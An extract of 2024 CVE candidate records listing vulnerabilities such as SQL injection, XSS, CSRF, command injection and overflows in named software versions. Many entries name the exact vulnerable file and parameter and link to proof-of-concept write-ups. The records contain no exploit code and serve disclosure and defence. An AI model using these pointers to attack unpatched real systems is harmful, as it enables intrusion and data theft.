CVE    2024    2285    Candidate    A vulnerability, which was classified as problematic, has been found in boyiddha Automated-Mess-Management-System 1.0. Affected by this issue is some unknown functionality of the file /member/member_edit.php. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-256052. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256052 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256052   |   MISC:VDB-256052 | boyiddha Automated-Mess-Management-System member_edit.php cross site scripting   |   URL:https://vuldb.com/?id.256052   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/STORED%20XSS%20member-member-edit.php%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/STORED%20XSS%20member-member-edit.php%20.md    Assigned (20240307)
CVE    2024    2284    Candidate    A vulnerability classified as problematic was found in boyiddha Automated-Mess-Management-System 1.0. Affected by this vulnerability is an unknown functionality of the file /member/chat.php of the component Chat Book. The manipulation of the argument msg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256051. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256051 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256051   |   MISC:VDB-256051 | boyiddha Automated-Mess-Management-System Chat Book chat.php cross site scripting   |   URL:https://vuldb.com/?id.256051   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/STORED%20XSS%20member-chat.php%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/STORED%20XSS%20member-chat.php%20.md    Assigned (20240307)
CVE    2024    22836    Candidate    An OS command injection vulnerability exists in Akaunting v3.1.3 and earlier. An attacker can manipulate the company locale when installing an app to execute system commands on the hosting server.    MISC:https://akaunting.com/   |   MISC:https://github.com/akaunting/akaunting/releases/tag/3.1.4   |   MISC:https://github.com/u32i/cve/tree/main/CVE-2024-22836    Assigned (20240111)
CVE    2024    2283    Candidate    A vulnerability classified as critical has been found in boyiddha Automated-Mess-Management-System 1.0. Affected is an unknown function of the file /member/view.php. The manipulation of the argument date leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256050 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256050 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256050   |   MISC:VDB-256050 | boyiddha Automated-Mess-Management-System view.php sql injection   |   URL:https://vuldb.com/?id.256050   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/SQL%20Injection%20member-view.php%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/SQL%20Injection%20member-view.php%20.md    Assigned (20240307)
CVE    2024    22824    Candidate    An issue in Timo v.2.0.3 allows a remote attacker to execute arbitrary code via the filetype restrictions in the UploadController.java component.    MISC:https://github.com/auntvt/Timo/issues/6    Assigned (20240111)
CVE    2024    2282    Candidate    A vulnerability was found in boyiddha Automated-Mess-Management-System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php of the component Login Page. The manipulation of the argument useremail leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256049 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256049 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256049   |   MISC:VDB-256049 | boyiddha Automated-Mess-Management-System Login Page index.php sql injection   |   URL:https://vuldb.com/?id.256049   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/SQL%20Injection%20Login.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/SQL%20Injection%20Login.md    Assigned (20240307)
CVE    2024    22819    Candidate    FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/email/email_templets_update.    MISC:https://github.com/mafangqian/cms/blob/main/2.md    Assigned (20240111)
CVE    2024    22818    Candidate    FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/site/filterKeyword_save    MISC:https://github.com/mafangqian/cms/blob/main/3.md    Assigned (20240111)
CVE    2024    22817    Candidate    FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/email/email_conf_updagte    MISC:https://github.com/mafangqian/cms/blob/main/1.md    Assigned (20240111)
CVE    2024    2281    Candidate    A vulnerability was found in boyiddha Automated-Mess-Management-System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/index.php of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256048. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256048 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256048   |   MISC:VDB-256048 | boyiddha Automated-Mess-Management-System Setting index.php access control   |   URL:https://vuldb.com/?id.256048   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/BROKEN%20ACCESS%20CONTROL%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/BROKEN%20ACCESS%20CONTROL%20.md    Assigned (20240307)
CVE    2024    22795    Candidate    Insecure Permissions vulnerability in Forescout SecureConnector v.11.3.06.0063 allows a local attacker to escalate privileges via the Recheck Compliance Status component.    MISC:https://gist.github.com/Hagrid29/aea0dc35a1e87813dbbb7b317853d023   |   MISC:https://github.com/Hagrid29/ForeScout-SecureConnector-EoP   |   MISC:https://www.forescout.com/    Assigned (20240111)
CVE    2024    22779    Candidate    Directory Traversal vulnerability in Kihron ServerRPExposer v.1.0.2 and before allows a remote attacker to execute arbitrary code via the loadServerPack in ServerResourcePackProviderMixin.java.    MISC:https://gist.github.com/apple502j/193358682885fe1a6708309ce934e4ed   |   MISC:https://github.com/Kihron/ServerRPExposer/commit/8f7b829df633f59e828d677f736c53652d6f1b8f   |   MISC:https://modrinth.com/mod/serverrpexposer    Assigned (20240111)
CVE    2024    22778    Candidate    HackMD CodiMD <2.5.2 is vulnerable to Denial of Service.    MISC:https://github.com/hackmdio/codimd/issues/1846    Assigned (20240111)
CVE    2024    22776    Candidate    Wallos 0.9 is vulnerable to Cross Site Scripting (XSS) in all text-based input fields without proper validation, excluding those requiring specific formats like date fields.    MISC:https://github.com/ellite/Wallos   |   MISC:https://webity-luescher.notion.site/webity-luescher/Wallos-v0-9-to-v1-2-2-CVE-2024-22776-Stored-XSS-Vulnerability-in-all-text-based-input-fields-6622fb4cfbe0430aa0b1d4b3edcb67b0    Assigned (20240111)
CVE    2024    22773    Candidate    Intelbras Roteador ACtion RF 1200 1.2.2 exposes the Password in Cookie resulting in Login Bypass.    MISC:https://medium.com/@wagneralves_87750/poc-cve-2024-22773-febf0d3a5433   |   MISC:https://www.youtube.com/watch?v=-r0TWJq55DU&t=7s    Assigned (20240111)
CVE    2024    22772    Candidate    Improper Input Validation in Hitron Systems DVR LGUVR-8H 1.02~4.02 allows an attacker to cause network attack in case of using default admin ID/PW.    MISC:http://www.hitron.co.kr/firmware/   |   URL:http://www.hitron.co.kr/firmware/    Assigned (20240111)
CVE    2024    22771    Candidate    Improper Input Validation in Hitron Systems DVR LGUVR-4H 1.02~4.02 allows an attacker to cause network attack in case of using default admin ID/PW.    MISC:http://www.hitron.co.kr/firmware/   |   URL:http://www.hitron.co.kr/firmware/    Assigned (20240111)
CVE    2024    22770    Candidate    Improper Input Validation in Hitron Systems DVR HVR-16781 1.03~4.02 allows an attacker to cause network attack in case of using default admin ID/PW.    MISC:http://www.hitron.co.kr/firmware/   |   URL:http://www.hitron.co.kr/firmware/    Assigned (20240111)
CVE    2024    2277    Candidate    A vulnerability was found in Bdtask G-Prescription Gynaecology & OBS Consultation Software 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /Setting/change_password_save of the component Password Reset Handler. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256046 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256046 | Bdtask G-Prescription Gynaecology & OBS Consultation Software Password Reset change_password_save cross-site request forgery   |   URL:https://vuldb.com/?id.256046   |   MISC:VDB-256046 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256046   |   MISC:https://drive.google.com/file/d/1SVYLzbnYzSyun79QBOsRuWuMkzyjclJM/view?usp=drivesdk   |   URL:https://drive.google.com/file/d/1SVYLzbnYzSyun79QBOsRuWuMkzyjclJM/view?usp=drivesdk    Assigned (20240307)
CVE    2024    22769    Candidate    Improper Input Validation in Hitron Systems DVR HVR-8781 1.03~4.02 allows an attacker to cause network attack in case of using default admin ID/PW.    MISC:http://www.hitron.co.kr/firmware/   |   URL:http://www.hitron.co.kr/firmware/    Assigned (20240111)
CVE    2024    22768    Candidate    Improper Input Validation in Hitron Systems DVR HVR-4781 1.03~4.02 allows an attacker to cause network attack in case of using default admin ID/PW.    MISC:http://www.hitron.co.kr/firmware/   |   URL:http://www.hitron.co.kr/firmware/    Assigned (20240111)
CVE    2024    2276    Candidate    A vulnerability has been found in Bdtask G-Prescription Gynaecology & OBS Consultation Software 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /Venue_controller/edit_venue/ of the component Edit Venue Page. The manipulation of the argument Venue map leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256045 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256045 | Bdtask G-Prescription Gynaecology & OBS Consultation Software Edit Venue Page cross site scripting   |   URL:https://vuldb.com/?id.256045   |   MISC:VDB-256045 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256045   |   MISC:https://drive.google.com/file/d/11QliZKy-7ylKph1vwlXVHaRn5Jmk0Bjg/view?usp=drivesdk   |   URL:https://drive.google.com/file/d/11QliZKy-7ylKph1vwlXVHaRn5Jmk0Bjg/view?usp=drivesdk    Assigned (20240307)
CVE    2024    22752    Candidate    Insecure permissions issue in EaseUS MobiMover 6.0.5 Build 21620 allows attackers to gain escalated privileges via use of crafted executable launched from the application installation directory.    MISC:https://github.com/hacker625/CVE-2024-22752    Assigned (20240111)
CVE    2024    22751    Candidate    D-Link DIR-882 DIR882A1_FW130B06 was discovered to contain a stack overflow via the sub_477AA0 function.    MISC:https://github.com/5erua/vuls/blob/main/dir882.md   |   MISC:https://www.dlink.com/en/security-bulletin/    Assigned (20240111)
CVE    2024    2275    Candidate    A vulnerability, which was classified as problematic, was found in Bdtask G-Prescription Gynaecology & OBS Consultation Software 1.0. Affected is an unknown function of the component OBS Patient/Gynee Prescription. The manipulation of the argument Patient Title/Full Name/Address/Cheif Complain/LMP/Menstrual Edd/OBS P/OBS Alc/Medicine Name/Medicine Type/Ml/Dose/Days/Comments/Template Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256044. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256044 | Bdtask G-Prescription Gynaecology & OBS Consultation Software OBS Patient/Gynee Prescription cross site scripting   |   URL:https://vuldb.com/?id.256044   |   MISC:VDB-256044 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256044   |   MISC:https://drive.google.com/file/d/11QliZKy-7ylKph1vwlXVHaRn5Jmk0Bjg/view?usp=drivesdk   |   URL:https://drive.google.com/file/d/11QliZKy-7ylKph1vwlXVHaRn5Jmk0Bjg/view?usp=drivesdk    Assigned (20240307)
CVE    2024    22749    Candidate    GPAC v2.3 was detected to contain a buffer overflow via the gf_isom_new_generic_sample_description function in isomedia/isom_write.c:4577    MISC:https://github.com/gpac/gpac/issues/2713   |   MISC:https://github.com/hanxuer/crashes/blob/main/gapc/01/readme.md    Assigned (20240111)
CVE    2024    2274    Candidate    A vulnerability, which was classified as problematic, has been found in Bdtask G-Prescription Gynaecology & OBS Consultation Software 1.0. This issue affects some unknown processing of the file /Home/Index of the component Prescription Dashboard. The manipulation of the argument Title leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256043. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256043 | Bdtask G-Prescription Gynaecology & OBS Consultation Software Prescription Dashboard Index cross site scripting   |   URL:https://vuldb.com/?id.256043   |   MISC:VDB-256043 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256043   |   MISC:https://drive.google.com/file/d/11QliZKy-7ylKph1vwlXVHaRn5Jmk0Bjg/view?usp=drivesdk   |   URL:https://drive.google.com/file/d/11QliZKy-7ylKph1vwlXVHaRn5Jmk0Bjg/view?usp=drivesdk    Assigned (20240307)
CVE    2024    22729    Candidate    NETIS SYSTEMS MW5360 V1.0.1.3031 was discovered to contain a command injection vulnerability via the password parameter on the login page.    MISC:https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md    Assigned (20240111)
CVE    2024    22727    Candidate    Teltonika TRB1-series devices with firmware before TRB1_R_00.07.05.2 allow attackers to exploit a firmware vulnerability via Ethernet LAN or USB.    MISC:https://teltonika-networks.com/newsroom/critical-security-update-for-trb1-series-gateways    Assigned (20240111)
CVE    2024    22725    Candidate    Orthanc versions before 1.12.2 are affected by a reflected cross-site scripting (XSS) vulnerability. The vulnerability was present in the server's error reporting.    MISC:https://orthanc.uclouvain.be/hg/orthanc/file/Orthanc-1.12.2/NEWS   |   MISC:https://orthanc.uclouvain.be/hg/orthanc/rev/505416b269a0    Assigned (20240111)
CVE    2024    22724    Candidate    An issue discovered in osCommerce v4 allows local attackers to bypass file upload restrictions and execute arbitrary code via the administrator profile photo upload feature.    MISC:https://github.com/osCommerce/osCommerce-V4/issues/62   |   MISC:https://medium.com/@cupc4k3/oscommerce-v4-rce-unveiling-the-file-upload-bypass-threat-f1ac0097880c    Assigned (20240111)
CVE    2024    22723    Candidate    Webtrees 2.1.18 is vulnerable to Directory Traversal. By manipulating the "media_folder" parameter in the URL, an attacker (in this case, an administrator) can navigate beyond the intended directory (the 'media/' directory) to access sensitive files in other parts of the application's file system.    MISC:https://cupc4k3.medium.com/cve-2024-22723-webtrees-vulnerability-uncovering-sensitive-data-through-path-traversal-7442e7a38b68    Assigned (20240111)
CVE    2024    22720    Candidate    Kanboard 1.2.34 is vulnerable to HTML Injection in the group management feature.    MISC:https://cupc4k3.medium.com/html-injection-vulnerability-in-kanboard-group-management-d9fe5154bb1b    Assigned (20240111)
CVE    2024    2272    Candidate    A vulnerability classified as critical was found in keerti1924 Online-Book-Store-Website 1.0. This vulnerability affects unknown code of the file /home.php of the component HTTP POST Request Handler. The manipulation of the argument product_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256042 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256042 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256042   |   MISC:VDB-256042 | keerti1924 Online-Book-Store-Website HTTP POST Request home.php sql injection   |   URL:https://vuldb.com/?id.256042   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/Blind%20SQL%20Injection%20%20Home/Blind%20SQL%20Injection%20Home.php%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/Blind%20SQL%20Injection%20%20Home/Blind%20SQL%20Injection%20Home.php%20.md    Assigned (20240307)
CVE    2024    22715    Candidate    Stupid Simple CMS <=1.2.4 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin-edit.php.    MISC:https://github.com/RumblingIsOccupied/cms/blob/main/1.md    Assigned (20240111)
CVE    2024    22714    Candidate    Stupid Simple CMS <=1.2.4 is vulnerable to Cross Site Scripting (XSS) in the editing section of the article content.    MISC:https://github.com/RumblingIsOccupied/cms/blob/main/2.md    Assigned (20240111)
CVE    2024    2271    Candidate    A vulnerability classified as critical has been found in keerti1924 Online-Book-Store-Website 1.0. This affects an unknown part of the file /shop.php of the component HTTP POST Request Handler. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256041 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256041 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256041   |   MISC:VDB-256041 | keerti1924 Online-Book-Store-Website HTTP POST Request shop.php sql injection   |   URL:https://vuldb.com/?id.256041   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/Blind%20SQL%20Injection%20%20Shop/Blind%20SQL%20Injection%20Shop.php%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/Blind%20SQL%20Injection%20%20Shop/Blind%20SQL%20Injection%20Shop.php%20.md    Assigned (20240307)
CVE    2024    22705    Candidate    An issue was discovered in ksmbd in the Linux kernel before 6.6.10. smb2_get_data_area_len in fs/smb/server/smb2misc.c can cause an smb_strndup_from_utf16 out-of-bounds access because the relationship between Name data and CreateContexts data is mishandled.    MISC:https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.6.10   |   MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d10c77873ba1e9e6b91905018e29e196fd5f863d    Assigned (20240111)
CVE    2024    2270    Candidate    A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /signup.php. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256040. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256040 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256040   |   MISC:VDB-256040 | keerti1924 Online-Book-Store-Website signup.php cross site scripting   |   URL:https://vuldb.com/?id.256040   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/StoredXSS%20Signup/Stored%20XSS%20signup.php%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/StoredXSS%20Signup/Stored%20XSS%20signup.php%20.md    Assigned (20240307)
CVE    2024    22699    Candidate    FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/admin/update_group_save.    MISC:https://github.com/biantaibao/cms/blob/main/1.md    Assigned (20240111)
CVE    2024    2269    Candidate    A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /search.php. The manipulation of the argument search leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256039. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256039 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256039   |   MISC:VDB-256039 | keerti1924 Online-Book-Store-Website search.php sql injection   |   URL:https://vuldb.com/?id.256039   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/SQL%20Injection%20Search/SQL%20Injection%20in%20search.php%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/SQL%20Injection%20Search/SQL%20Injection%20in%20search.php%20.md    Assigned (20240307)
CVE    2024    22682    Candidate    DuckDB <=0.9.2 and DuckDB extension-template <=0.9.2 are vulnerable to malicious extension injection via the custom extension feature.    MISC:https://github.com/Tu0Laj1/database_test    Assigned (20240111)
CVE    2024    2268    Candidate    A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0. It has been classified as critical. Affected is an unknown function of the file /product_update.php?update=1. The manipulation of the argument update_image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256038 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256038 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256038   |   MISC:VDB-256038 | keerti1924 Online-Book-Store-Website unrestricted upload   |   URL:https://vuldb.com/?id.256038   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/File%20Upload/Arbitrary%20FIle%20Upload%20in%20product_update.php%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/File%20Upload/Arbitrary%20FIle%20Upload%20in%20product_update.php%20.md    Assigned (20240307)
CVE    2024    2267    Candidate    A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0 and classified as problematic. This issue affects some unknown processing of the file /shop.php. The manipulation of the argument product_price leads to business logic errors. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256037 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256037 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256037   |   MISC:VDB-256037 | keerti1924 Online-Book-Store-Website shop.php logic error   |   URL:https://vuldb.com/?id.256037   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/Business%20Logic/Business%20Logic%20shop.php%20.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/Business%20Logic/Business%20Logic%20shop.php%20.md    Assigned (20240307)
CVE    2024    22667    Candidate    Vim before 9.0.2142 has a stack-based buffer overflow because did_set_langmap in map.c calls sprintf to write to the error buffer that is passed down to the option callback functions.    CONFIRM:https://security.netapp.com/advisory/ntap-20240223-0008/   |   FEDORA:FEDORA-2024-12513b5cee   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UI44Y4LJLG34D4HNB6NTPLUPZREHAEL7/   |   FEDORA:FEDORA-2024-1c85d5b179   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UIQLVUSYHDN3644K6EFDI7PRZOTIKXM3/   |   MISC:https://gist.githubusercontent.com/henices/2467e7f22dcc2aa97a2453e197b55a0c/raw/7b54bccc9a129c604fb139266f4497ab7aaa94c7/gistfile1.txt   |   MISC:https://github.com/vim/vim/commit/b39b240c386a5a29241415541f1c99e2e6b8ce47    Assigned (20240111)
CVE    2024    22663    Candidate    TOTOLINK_A3700R_V9.1.2u.6165_20211012 has a command injection vulnerability via setOpModeCfg    MISC:https://github.com/Covteam/iot_vuln/tree/main/setOpModeCfg2    Assigned (20240111)
CVE    2024    22662    Candidate    TOTOLINK A3700R_V9.1.2u.6165_20211012 has a stack overflow vulnerability via setParentalRules    MISC:https://github.com/Covteam/iot_vuln/tree/main/setParentalRules    Assigned (20240111)
CVE    2024    22660    Candidate    TOTOLINK_A3700R_V9.1.2u.6165_20211012 has a stack overflow vulnerability via setLanguageCfg    MISC:https://github.com/Covteam/iot_vuln/tree/main/setLanguageCfg    Assigned (20240111)
CVE    2024    2266    Candidate    A vulnerability has been found in keerti1924 Secret-Coder-PHP-Project 1.0 and classified as problematic. This vulnerability affects unknown code of the file /login.php of the component Login Page. The manipulation of the argument emailcookie/passwordcookie leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256036. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256036 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256036   |   MISC:VDB-256036 | keerti1924 Secret-Coder-PHP-Project Login Page login.php cross site scripting   |   URL:https://vuldb.com/?id.256036   |   MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/keerti1924%20%5BSecret-Coder-PHP-Project%20XSS%5D%20on%20login.php%20via%20arbitrary%20cookies.md   |   URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/keerti1924%20%5BSecret-Coder-PHP-Project%20XSS%5D%20on%20login.php%20via%20arbitrary%20cookies.md    Assigned (20240307)
CVE    2024    22651    Candidate    There is a command injection vulnerability in the ssdpcgi_main function of cgibin binary in D-Link DIR-815 router firmware v1.04.    MISC:https://github.com/goldds96/Report/blob/main/DLink/DIR-815/CI.md    Assigned (20240111)
CVE    2024    2265    Candidate    A vulnerability, which was classified as problematic, was found in keerti1924 PHP-MYSQL-User-Login-System 1.0. This affects an unknown part of the file login.sql. The manipulation leads to inclusion of sensitive information in source code. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256035. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256035 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256035   |   MISC:VDB-256035 | keerti1924 PHP-MYSQL-User-Login-System login.sql inclusion of sensitive information in source code   |   URL:https://vuldb.com/?id.256035   |   MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/keerti1924%20publicly%20exposed%20password%20hashes.md   |   URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/keerti1924%20publicly%20exposed%20password%20hashes.md    Assigned (20240307)
CVE    2024    22648    Candidate    A Blind SSRF vulnerability exists in the "Crawl Meta Data" functionality of SEO Panel version 4.10.0. This makes it possible for remote attackers to scan ports in the local environment.    MISC:https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22648    Assigned (20240111)
CVE    2024    22647    Candidate    A user enumeration vulnerability was found in SEO Panel 4.10.0. This issue occurs during user authentication, where a difference in error messages could allow an attacker to determine if a username is valid or not, enabling a brute-force attack with valid usernames.    MISC:https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22647    Assigned (20240111)
CVE    2024    22646    Candidate    An email address enumeration vulnerability exists in the password reset function of SEO Panel version 4.10.0. This allows an attacker to guess which emails exist on the system.    MISC:https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22646    Assigned (20240111)
CVE    2024    22643    Candidate    A Cross-Site Request Forgery (CSRF) vulnerability in SEO Panel version 4.10.0 allows remote attackers to perform unauthorized user password resets.    MISC:https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22643    Assigned (20240111)
CVE    2024    2264    Candidate    A vulnerability, which was classified as critical, has been found in keerti1924 PHP-MYSQL-User-Login-System 1.0. Affected by this issue is some unknown functionality of the file /login.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256034 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256034 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256034   |   MISC:VDB-256034 | keerti1924 PHP-MYSQL-User-Login-System login.php sql injection   |   URL:https://vuldb.com/?id.256034   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20PHP-MYSQL-User-Login-System/SQLI%20Auth.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20PHP-MYSQL-User-Login-System/SQLI%20Auth.md    Assigned (20240307)
CVE    2024    22639    Candidate    iGalerie v3.0.22 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Titre (Title) field in the editing interface.    MISC:https://packetstormsecurity.com/files/176411/iGalerie-3.0.22-Cross-Site-Scripting.html    Assigned (20240111)
CVE    2024    22638    Candidate    liveSite v2019.1 was discovered to contain a remote code execution (RCE) vulnerability via the component /livesite/edit_designer_region.php.    MISC:https://packetstormsecurity.com/files/176420/liveSite-2019.1-Remote-Code-Execution.html    Assigned (20240111)
CVE    2024    22637    Candidate    Form Tools v3.1.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /form_builder/preview.php?form_id=2.    MISC:https://packetstormsecurity.com/files/176403/Form-Tools-3.1.1-Cross-Site-Scripting.html    Assigned (20240111)
CVE    2024    22636    Candidate    PluXml Blog v5.8.9 was discovered to contain a remote code execution (RCE) vulnerability in the Static Pages feature. This vulnerability is exploited via injecting a crafted payload into the Content field.    MISC:https://github.com/capture0x/PluXml-RCE/blob/main/PluXml.txt    Assigned (20240111)
